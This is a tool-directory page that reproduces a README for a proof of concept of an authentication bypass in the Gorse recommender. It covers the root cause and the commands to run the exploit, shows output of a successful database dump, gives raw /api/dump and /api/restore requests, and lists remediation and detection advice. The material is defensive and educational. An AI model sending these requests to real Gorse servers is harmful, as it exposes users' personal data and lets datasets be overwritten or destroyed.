Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-56782-Gorse-Auth-Bypass — CVE-2026-56782 — Gorse <0.5.10 unauthenticated DB dump/restore (admin_api_key fail-open). Lab + PoC, verified e2e. | Kitploit
Tools/GitHubGitHub/biitts/cve-2026-56782-gorse-auth-bypass
Vulnerability AnalysisExploitationData ExfiltrationWeb SecurityCTFPenetration TestingAuthenticationLearning & EducationLabs & Practice
GitHubbiitts/cve-2026-56782-gorse-auth-bypass

CVE-2026-56782-Gorse-Auth-Bypass

CVE-2026-56782 — Gorse <0.5.10 unauthenticated DB dump/restore (admin_api_key fail-open). Lab + PoC, verified e2e.

View Repository
193 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-56782 — Gorse Unauthenticated Database Dump / Restore (Auth Bypass)

Gorse < 0.5.10 ships with admin_api_key = "". The master HTTP endpoints /api/dump and /api/restore are gated by an admin check that fails open when no key is configured — the default. An unauthenticated, network-reachable attacker can exfiltrate the entire dataset (users, items, feedback / PII) or overwrite it.

CVECVE-2026-56782
AffectedGorse < 0.5.10
Fixed0.5.10
ClassCWE-305 (Authentication Bypass by Primary Weakness) / CWE-306 (Missing Auth)
CVSS 3.19.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AuthNone (default admin_api_key is empty)
EndpointsGET /api/dump, POST /api/restore (master HTTP, default port 8088)
StatusCONFIRMED — reproduced end-to-end against zhenghaoz/gorse-in-one:0.5.8

Root cause

master/rest.go guards the dump/restore handlers with checkAdmin():

func (m *Master) checkAdmin(request *http.Request) bool {
    if m.Config.Master.AdminAPIKey == "" {
        return true                 // <-- fail-open: no key configured => everyone is admin
    }
    if request.Header.Get("X-API-Key") == m.Config.Master.AdminAPIKey {
        return true
    }
    return false
}

func (m *Master) dump(response http.ResponseWriter, request *http.Request) {
    if !m.checkAdmin(request) { writeError(response, 401, "unauthorized"); return }
    ...                              // streams every user, item and feedback row
}

func (m *Master) restore(response http.ResponseWriter, request *http.Request) {
    if !m.checkAdmin(request) { writeError(response, 401, "unauthorized"); return }
    ...                              // m.Restore(request.Body) — overwrites the dataset
}

The shipped config/config.toml sets admin_api_key = "". With the default config, checkAdmin() returns true for every request — the X-API-Key header is never consulted — so both endpoints are world-readable and world-writable.

Impact

  • Confidentiality — GET /api/dump streams the full database: every user id and labels, every item, and the entire feedback graph (who interacted with what). For a recommender backing a real product this is bulk PII / behavioural data.
  • Integrity / Availability — POST /api/restore replaces the dataset with attacker-supplied content, enabling silent data poisoning or destruction.

Reproduce

# 1. Start the vulnerable server (official image, default config = no auth).
docker compose -f lab/docker-compose.yml up -d
#    --playground seeds a real users/items/feedback dataset to exfiltrate.

# 2. Run the PoC (no credentials).
python3 exploit.py http://127.0.0.1:8088 -o dump.bin

Observed:

[*] GET http://127.0.0.1:8088/api/dump  (no X-API-Key header)
[*] HTTP 200  content-type: application/octet-stream

[+] UNAUTHENTICATED DATA EXFILTRATION CONFIRMED
    users    : 2079
    items    : 22320
    feedback : 331901
    payload  : 262747105 protobuf bytes
    sample user ids : 0-vortex, 0markill, 0q2, 0x4richard, 0x973

[*] POST http://127.0.0.1:8088/api/restore  (no X-API-Key header, EOF-only body)
[+] HTTP 200 (not 401) - checkAdmin bypassed: /api/restore is writable unauthenticated.

A bogus X-API-Key header still returns 200 — confirming the key is ignored entirely when admin_api_key is unset (the fail-open path), not merely matched.

Raw requests

GET /api/dump HTTP/1.1
Host: 127.0.0.1:8088
POST /api/restore HTTP/1.1
Host: 127.0.0.1:8088
Content-Type: application/octet-stream

<dump stream: int64 LE markers (-1 users, -2 items, -3 feedback, 0 EOF) + length-prefixed protobuf>

Remediation

  • Upgrade to Gorse ≥ 0.5.10, which removes the empty-key fail-open from the admin check (an unset key no longer grants access).
  • As a stop-gap on affected versions, set a strong admin_api_key (and dashboard credentials), terminate TLS in front of the master, and never expose the master HTTP port (8088) to untrusted networks.

Detection

Alert on GET /api/dump or POST /api/restore to the master port from any client lacking a valid X-API-Key, and on large application/octet-stream responses from /api/dump.

See ANALYSIS.md for the request flow, the dump stream format, and the patch.


  • Author: Caio Fabrício — github.com/BiiTts
  • Vulnerability credit belongs to the original CVE reporter; this repository is an independent reproduction for defensive and educational use. For authorized security testing only.
Download Tool